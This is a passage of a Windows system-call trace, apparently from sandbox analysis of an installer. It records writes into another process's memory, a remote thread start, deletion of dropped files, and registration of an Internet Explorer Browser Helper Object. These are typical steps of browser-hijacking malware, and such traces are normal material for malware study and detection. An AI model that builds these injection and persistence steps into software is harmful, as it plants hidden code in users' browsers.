) == 0x0
 01400   456   NtAllocateVirtualMemory  (112, 0, 0, 1636, 4096, 4, ... 131072, 4096, ) == 0x0
 01401   456   NtWriteVirtualMemory  (112, 0x20000,  (112, 0x20000, "\0\20\0\0d\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3\0\0\0\0\0\0\0\13\0\0\0 \0\10\2\220\2\0\0\0\0\0\0\374\0\376\0\230\4\0\0>\0@\0\230\5\0\0$\0&\0\330\5\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0>\0@\0\0\6\0\0\36\0 \0@\6\0\0\0\0\2\0`\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 1636, ... 0x0, ) , 1636, ... 0x0, ) == 0x0
 01402   456   NtWriteVirtualMemory  (112, 0x7ffdf010,  (112, 0x7ffdf010, "\0\0\2\0", 4, ... 0x0, ) , 4, ... 0x0, ) == 0x0
 01403   456   NtWriteVirtualMemory  (112, 0x7ffdf1e8,  (112, 0x7ffdf1e8, "\0\0\0\0", 4, ... 0x0, ) , 4, ... 0x0, ) == 0x0
 01404   456   NtFreeVirtualMemory  (-1, (0x960000), 0, 32768, ... (0x960000), 4096, ) == 0x0
 01405   456   NtAllocateVirtualMemory  (112, 0, 0, 1048576, 8192, 4, ... 196608, 1048576, ) == 0x0
 01406   456   NtAllocateVirtualMemory  (112, 1208320, 0, 36864, 4096, 4, ... 1208320, 36864, ) == 0x0
 01407   456   NtProtectVirtualMemory  (112, (0x127000), 4096, 260, ... (0x127000), 4096, 4, ) == 0x0
 01408   456   NtCreateThread  (0x1f03ff, 0x0, 112, 1241788, 1242508, 1, ... 116, {584, 580}, ) == 0x0
 01409   456   NtRequestWaitReplyPort  (24, {168, 196, new_msg, 0, 1312680, 1310720, 0, 1243608}  (24, {168, 196, new_msg, 0, 1312680, 1310720, 0, 1243608} "\0\0\0\0\0\0\1\0\2$\370w\10\274\24\0s\0\0\0t\0\0\0H\2\0\0D\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310\374\22\0\0H\365w\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\360\375\177\0\0\0\0\0\0:\0\\0P\0" ... {168, 196, reply, 0, 452, 456, 1528, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\10\274\24\0p\0\0\0t\0\0\0H\2\0\0D\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310\374\22\0\0H\365w\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\360\375\177\0\0\0\0\0\0:\0\\0P\0" )  ... {168, 196, reply, 0, 452, 456, 1528, 0}  (24, {168, 196, new_msg, 0, 1312680, 1310720, 0, 1243608} "\0\0\0\0\0\0\1\0\2$\370w\10\274\24\0s\0\0\0t\0\0\0H\2\0\0D\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310\374\22\0\0H\365w\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\360\375\177\0\0\0\0\0\0:\0\\0P\0" ... {168, 196, reply, 0, 452, 456, 1528, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\10\274\24\0p\0\0\0t\0\0\0H\2\0\0D\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310\374\22\0\0H\365w\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\360\375\177\0\0\0\0\0\0:\0\\0P\0" )  ) == 0x0
 01410   456   NtResumeThread  (116, ... 1, ) == 0x0
 01411   456   NtClose  (96, ... ) == 0x0
 01412   456   NtClose  (100, ... ) == 0x0
 01413   456   NtClose  (116, ... ) == 0x0
 01414   456   NtWaitForSingleObject  (112, 0, {-1000000, -1}, ... ) == 0x102
 01415   456   NtWaitForSingleObject  (112, 0, {-1000000, -1}, ... ) == 0x102
 01416   456   NtWaitForSingleObject  (112, 0, {-1000000, -1}, ... ) == 0x102
 01417   456   NtWaitForSingleObject  (112, 0, {-1000000, -1}, ... ) == 0x0
 01418   456   NtQueryEvent  (112, Basic, 8, ... ) == STATUS_OBJECT_TYPE_MISMATCH
 01419   456   NtQueryInformationProcess  (112, Basic, 24, ... {ExitStatus=0x0,PebBaseAddress=0x7ffdf000,AffinityMask=0x1,BasePriority=8,Pid=584,ParentPid=452,}, 0x0, ) == 0x0
 01420   456   NtClose  (112, ... ) == 0x0
 01421   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01422   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01423   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\"}, 3, 16417, ... 112, {status=0x0, info=1}, ) }, 3, 16417, ... 112, {status=0x0, info=1}, ) == 0x0
 01424   456   NtQueryDirectoryFile  (112, 0, 0, 0, 1242816, 616, BothDirectory, 1,  (112, 0, 0, 0, 1242816, 616, BothDirectory, 1, "folder.js", 0, ... {status=0x0, info=112}, ) , 0, ... {status=0x0, info=112}, ) == 0x0
 01425   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01426   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01427   456   NtClose  (112, ... ) == 0x0
 01428   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\"}, 3, 16417, ... 112, {status=0x0, info=1}, ) }, 3, 16417, ... 112, {status=0x0, info=1}, ) == 0x0
 01429   456   NtQueryDirectoryFile  (112, 0, 0, 0, 1242852, 616, BothDirectory, 1,  (112, 0, 0, 0, 1242852, 616, BothDirectory, 1, "folder.js", 0, ... {status=0x0, info=112}, ) , 0, ... {status=0x0, info=112}, ) == 0x0
 01430   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\folder.js"}, 7, 2113568, ... 116, {status=0x0, info=1}, ) }, 7, 2113568, ... 116, {status=0x0, info=1}, ) == 0x0
 01431   456   NtSetInformationFile  (116, 1244080, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01432   456   NtClose  (116, ... ) == 0x0
 01433   456   NtOpenFile  (0x10080, {24, 0, 0x40, 0, 0,  (0x10080, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\folder.js"}, 7, 2113600, ... 116, {status=0x0, info=1}, ) }, 7, 2113600, ... 116, {status=0x0, info=1}, ) == 0x0
 01434   456   NtQueryInformationFile  (116, 1244148, 8, AttributeFlag, ... ) == STATUS_INVALID_PARAMETER
 01435   456   NtSetInformationFile  (116, 1244199, 1, Disposition, ... {status=0x0, info=0}, ) == 0x0
 01436   456   NtClose  (116, ... ) == 0x0
 01437   456   NtQueryDirectoryFile  (112, 0, 0, 0, 1366408, 4096, BothDirectory, 0, 0x0, 0, ... ) == STATUS_NO_MORE_FILES
 01438   456   NtClose  (112, ... ) == 0x0
 01439   456   NtOpenFile  (0x80100000, {24, 0, 0x40, 0, 0,  (0x80100000, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\ini.ini"}, 7, 96, ... 112, {status=0x0, info=1}, ) }, 7, 96, ... 112, {status=0x0, info=1}, ) == 0x0
 01440   456   NtLockFile  (112, 0, 0, 0, {0, 0}, {-1, -1}, 1, 0, 0, ... {status=0x0, info=-2142329745}, ) == 0x0
 01441   456   NtQueryInformationFile  (112, 1367320, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 01442   456   NtAllocateVirtualMemory  (-1, 0, 0, 1048641, 8192, 4, ... 10158080, 1052672, ) == 0x0
 01443   456   NtAllocateVirtualMemory  (-1, 10158080, 0, 65, 4096, 4, ... 10158080, 4096, ) == 0x0
 01444   456   NtReadFile  (112, 0, 0, 0, 61, 0x0, 2012046884, ... {status=0x0, info=61},  (112, 0, 0, 0, 61, 0x0, 2012046884, ... {status=0x0, info=61}, "[section]\15\12dir=C:\Program Files\Common Files\15\12name=meno.dll\15\12", ) , ) == 0x0
 01445   456   NtFreeVirtualMemory  (-1, (0x9b0000), 1052672, 32768, ... (0x9b0000), 1052672, ) == 0x0
 01446   456   NtUnlockFile  (112, {0, 0}, {-1, -1}, 456, ... ) == STATUS_RANGE_NOT_LOCKED
 01447   456   NtClose  (112, ... ) == 0x0
 01448   456   NtOpenFile  (0x80100000, {24, 0, 0x40, 0, 0,  (0x80100000, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\ini.ini"}, 7, 96, ... 112, {status=0x0, info=1}, ) }, 7, 96, ... 112, {status=0x0, info=1}, ) == 0x0
 01449   456   NtLockFile  (112, 0, 0, 0, {0, 0}, {-1, -1}, 1, 0, 0, ... {status=0x0, info=-2142329745}, ) == 0x0
 01450   456   NtQueryInformationFile  (112, 1367320, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 01451   456   NtAllocateVirtualMemory  (-1, 0, 0, 1048641, 8192, 4, ... 10158080, 1052672, ) == 0x0
 01452   456   NtAllocateVirtualMemory  (-1, 10158080, 0, 65, 4096, 4, ... 10158080, 4096, ) == 0x0
 01453   456   NtReadFile  (112, 0, 0, 0, 61, 0x0, 2012046884, ... {status=0x0, info=61},  (112, 0, 0, 0, 61, 0x0, 2012046884, ... {status=0x0, info=61}, "[section]\15\12dir=C:\Program Files\Common Files\15\12name=meno.dll\15\12", ) , ) == 0x0
 01454   456   NtFreeVirtualMemory  (-1, (0x9b0000), 1052672, 32768, ... (0x9b0000), 1052672, ) == 0x0
 01455   456   NtUnlockFile  (112, {0, 0}, {-1, -1}, 456, ... ) == STATUS_RANGE_NOT_LOCKED
 01456   456   NtClose  (112, ... ) == 0x0
 01457   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01458   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01459   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\"}, 3, 16417, ... 112, {status=0x0, info=1}, ) }, 3, 16417, ... 112, {status=0x0, info=1}, ) == 0x0
 01460   456   NtQueryDirectoryFile  (112, 0, 0, 0, 1242816, 616, BothDirectory, 1,  (112, 0, 0, 0, 1242816, 616, BothDirectory, 1, "ini.ini", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 01461   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01462   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01463   456   NtClose  (112, ... ) == 0x0
 01464   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\"}, 3, 16417, ... 112, {status=0x0, info=1}, ) }, 3, 16417, ... 112, {status=0x0, info=1}, ) == 0x0
 01465   456   NtQueryDirectoryFile  (112, 0, 0, 0, 1242852, 616, BothDirectory, 1,  (112, 0, 0, 0, 1242852, 616, BothDirectory, 1, "ini.ini", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 01466   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\ini.ini"}, 7, 2113568, ... 116, {status=0x0, info=1}, ) }, 7, 2113568, ... 116, {status=0x0, info=1}, ) == 0x0
 01467   456   NtSetInformationFile  (116, 1244080, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01468   456   NtClose  (116, ... ) == 0x0
 01469   456   NtOpenFile  (0x10080, {24, 0, 0x40, 0, 0,  (0x10080, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\ini.ini"}, 7, 2113600, ... 116, {status=0x0, info=1}, ) }, 7, 2113600, ... 116, {status=0x0, info=1}, ) == 0x0
 01470   456   NtQueryInformationFile  (116, 1244148, 8, AttributeFlag, ... ) == STATUS_INVALID_PARAMETER
 01471   456   NtSetInformationFile  (116, 1244199, 1, Disposition, ... {status=0x0, info=0}, ) == 0x0
 01472   456   NtClose  (116, ... ) == 0x0
 01473   456   NtQueryDirectoryFile  (112, 0, 0, 0, 1367912, 4096, BothDirectory, 0, 0x0, 0, ... ) == STATUS_NO_MORE_FILES
 01474   456   NtClose  (112, ... ) == 0x0
 01475   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01476   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01477   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 112, {status=0x0, info=1}, ) }, 3, 16417, ... 112, {status=0x0, info=1}, ) == 0x0
 01478   456   NtQueryDirectoryFile  (112, 0, 0, 0, 1243184, 616, BothDirectory, 1,  (112, 0, 0, 0, 1243184, 616, BothDirectory, 1, "Program Files", 0, ... {status=0x0, info=120}, ) , 0, ... {status=0x0, info=120}, ) == 0x0
 01479   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01480   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01481   456   NtClose  (112, ... ) == 0x0
 01482   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01483   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01484   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\"}, 3, 16417, ... 112, {status=0x0, info=1}, ) }, 3, 16417, ... 112, {status=0x0, info=1}, ) == 0x0
 01485   456   NtQueryDirectoryFile  (112, 0, 0, 0, 1243184, 616, BothDirectory, 1,  (112, 0, 0, 0, 1243184, 616, BothDirectory, 1, "Common Files", 0, ... {status=0x0, info=118}, ) , 0, ... {status=0x0, info=118}, ) == 0x0
 01486   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01487   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01488   456   NtClose  (112, ... ) == 0x0
 01489   456   NtOpenFile  (0x100020, {24, 0, 0x42, 0, 0,  (0x100020, {24, 0, 0x42, 0, 0, "\??\C:\Program Files\Common Files"}, 3, 33, ... 112, {status=0x0, info=1}, ) }, 3, 33, ... 112, {status=0x0, info=1}, ) == 0x0
 01490   456   NtQueryVolumeInformationFile  (112, 1244424, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 01491   456   NtClose  (84, ... ) == 0x0
 01492   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01493   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01494   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\Common Files\"}, 3, 16417, ... 84, {status=0x0, info=1}, ) }, 3, 16417, ... 84, {status=0x0, info=1}, ) == 0x0
 01495   456   NtQueryDirectoryFile  (84, 0, 0, 0, 1243184, 616, BothDirectory, 1,  (84, 0, 0, 0, 1243184, 616, BothDirectory, 1, "meno.dll", 0, ... ) , 0, ... ) == STATUS_NO_SUCH_FILE
 01496   456   NtClose  (84, ... ) == 0x0
 01497   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01498   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01499   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1244440, ... ) }, 1244440, ... ) == 0x0
 01500   456   NtCreateFile  (0x40100080, {24, 0, 0x40, 0, 1244420,  (0x40100080, {24, 0, 0x40, 0, 1244420, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 0x0, 32, 1, 2, 96, 0, 0, ... ) }, 0x0, 32, 1, 2, 96, 0, 0, ... ) == STATUS_OBJECT_NAME_COLLISION
 01501   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01502   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01503   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242296, ... ) }, 1242296, ... ) == 0x0
 01504   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 5, 96, ... 84, {status=0x0, info=1}, ) }, 5, 96, ... 84, {status=0x0, info=1}, ) == 0x0
 01505   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 84, ... 116, ) == 0x0
 01506   456   NtClose  (84, ... ) == 0x0
 01507   456   NtMapViewOfSection  (116, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x960000), 0x0, 12288, ) == 0x0
 01508   456   NtClose  (116, ... ) == 0x0
 01509   456   NtUnmapViewOfSection  (-1, 0x960000, ... ) == 0x0
 01510   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242224, ... ) }, 1242224, ... ) == 0x0
 01511   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 5, 96, ... 116, {status=0x0, info=1}, ) }, 5, 96, ... 116, {status=0x0, info=1}, ) == 0x0
 01512   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 116, ... 84, ) == 0x0
 01513   456   NtClose  (116, ... ) == 0x0
 01514   456   NtMapViewOfSection  (84, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x960000), 0x0, 12288, ) == 0x0
 01515   456   NtClose  (84, ... ) == 0x0
 01516   456   NtUnmapViewOfSection  (-1, 0x960000, ... ) == 0x0
 01517   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242540, ... ) }, 1242540, ... ) == 0x0
 01518   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242540, ... ) }, 1242540, ... ) == 0x0
 01519   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 5, 96, ... 84, {status=0x0, info=1}, ) }, 5, 96, ... 84, {status=0x0, info=1}, ) == 0x0
 01520   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 84, ... 116, ) == 0x0
 01521   456   NtQuerySection  (116, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 01522   456   NtClose  (84, ... ) == 0x0
 01523   456   NtMapViewOfSection  (116, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x10000000), 0x0, 24576, ) == 0x0
 01524   456   NtClose  (116, ... ) == 0x0
 01525   456   NtProtectVirtualMemory  (-1, (0x10003000), 88, 4, ... (0x10003000), 4096, 2, ) == 0x0
 01526   456   NtProtectVirtualMemory  (-1, (0x10003000), 4096, 2, ... (0x10003000), 4096, 4, ) == 0x0
 01527   456   NtFlushInstructionCache  (-1, 268447744, 88, ... ) == 0x0
 01528   456   NtProtectVirtualMemory  (-1, (0x10003000), 88, 4, ... (0x10003000), 4096, 2, ) == 0x0
 01529   456   NtProtectVirtualMemory  (-1, (0x10003000), 4096, 2, ... (0x10003000), 4096, 4, ) == 0x0
 01530   456   NtFlushInstructionCache  (-1, 268447744, 88, ... ) == 0x0
 01531   456   NtProtectVirtualMemory  (-1, (0x10003000), 88, 4, ... (0x10003000), 4096, 2, ) == 0x0
 01532   456   NtProtectVirtualMemory  (-1, (0x10003000), 4096, 2, ... (0x10003000), 4096, 4, ) == 0x0
 01533   456   NtFlushInstructionCache  (-1, 268447744, 88, ... ) == 0x0
 01534   456   NtProtectVirtualMemory  (-1, (0x10004008), 4, 64, ... (0x10004000), 4096, 4, ) == 0x0
 01535   456   NtAllocateVirtualMemory  (-1, 1372160, 0, 8192, 4096, 4, ... 1372160, 8192, ) == 0x0
 01536   456   NtUnmapViewOfSection  (-1, 0x10000000, ... ) == 0x0
 01537   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01538   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01539   456   NtCreateKey  (0x2, {24, 48, 0x40, 0, 0,  (0x2, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{704FA92D-7CE5-4490-A957-52B727FC6345}"}, 0, 0x0, 0, ... ) }, 0, 0x0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01540   456   NtCreateKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "SOFTWARE"}, 0, 0x0, 0, ... 116, 2, ) }, 0, 0x0, 0, ... 116, 2, ) == 0x0
 01541   456   NtCreateKey  (0x2000000, {24, 116, 0x40, 0, 0,  (0x2000000, {24, 116, 0x40, 0, 0, "Microsoft"}, 0, 0x0, 0, ... 84, 2, ) }, 0, 0x0, 0, ... 84, 2, ) == 0x0
 01542   456   NtClose  (116, ... ) == 0x0
 01543   456   NtCreateKey  (0x2000000, {24, 84, 0x40, 0, 0,  (0x2000000, {24, 84, 0x40, 0, 0, "Windows"}, 0, 0x0, 0, ... 116, 2, ) }, 0, 0x0, 0, ... 116, 2, ) == 0x0
 01544   456   NtClose  (84, ... ) == 0x0
 01545   456   NtCreateKey  (0x2000000, {24, 116, 0x40, 0, 0,  (0x2000000, {24, 116, 0x40, 0, 0, "CurrentVersion"}, 0, 0x0, 0, ... 84, 2, ) }, 0, 0x0, 0, ... 84, 2, ) == 0x0
 01546   456   NtClose  (116, ... ) == 0x0
 01547   456   NtCreateKey  (0x2000000, {24, 84, 0x40, 0, 0,  (0x2000000, {24, 84, 0x40, 0, 0, "Explorer"}, 0, 0x0, 0, ... 116, 2, ) }, 0, 0x0, 0, ... 116, 2, ) == 0x0
 01548   456   NtClose  (84, ... ) == 0x0
 01549   456   NtCreateKey  (0x2000000, {24, 116, 0x40, 0, 0,  (0x2000000, {24, 116, 0x40, 0, 0, "Browser Helper Objects"}, 0, 0x0, 0, ... }, 0, 0x0, 0, ...
 01550   456   NtSetInformationFile  (-2147482808, -130579420, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 01551   456   NtSetInformationFile  (-2147482808, -130579892, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 01552   456   NtSetInformationFile  (-2147482808, -130579516, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 01549   456   NtCreateKey  ... 84, 1, ) == 0x0
 01553   456   NtClose  (116, ... ) == 0x0
 01554   456   NtCreateKey  (0x2, {24, 84, 0x40, 0, 0,  (0x2, {24, 84, 0x40, 0, 0, "{704FA92D-7CE5-4490-A957-52B727FC6345}"}, 0, 0x0, 0, ... 116, 1, ) }, 0, 0x0, 0, ... 116, 1, ) == 0x0
 01555   456   NtClose  (84, ... ) == 0x0
 01556   456   NtSetValueKey  (116, " (116, "", 0, 1, "\0\0", 2, ... ) \0\0", 2, ... ) == 0x0
 01557   456   NtClose  (116, ... ) == 0x0
 01558   456   NtQueryKey  (90, Name, 382, ... {Name= (90, Name, 382, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSESs"}, 138, ) }, 138, ) == 0x0
 01559   456   NtOpenKey  (0x2000000, {24, 90, 0x40, 0, 0,  (0x2000000, {24, 90, 0x40, 0, 0, "CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01560   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes"}, ... 116, ) }, ... 116, ) == 0x0
 01561   456   NtCreateKey  (0x2, {24, 116, 0x40, 0, 0,  (0x2, {24, 116, 0x40, 0, 0, "CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}"}, 0, 0x0, 0, ... }, 0, 0x0, 0, ...
 01562   456   NtSetInformationFile  (-2147482808, -130579420, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 01563   456   NtSetInformationFile  (-2147482808, -130579524, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 01564   456   NtSetInformationFile  (-2147482808, -130579516, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 01561   456   NtCreateKey  ... 84, 1, ) == 0x0
 01565   456   NtClose  (116, ... ) == 0x0
 01566   456   NtQueryKey  (86, Name, 392, ... {Name= (86, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{704FA92D-7CE5-4490-A957-52B727FC6345}b"}, 162, ) }, 162, ) == 0x0
 01567   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01568   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 116, ) == 0x0
 01569   456   NtQueryInformationToken  (116, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01570   456   NtClose  (116, ... ) == 0x0
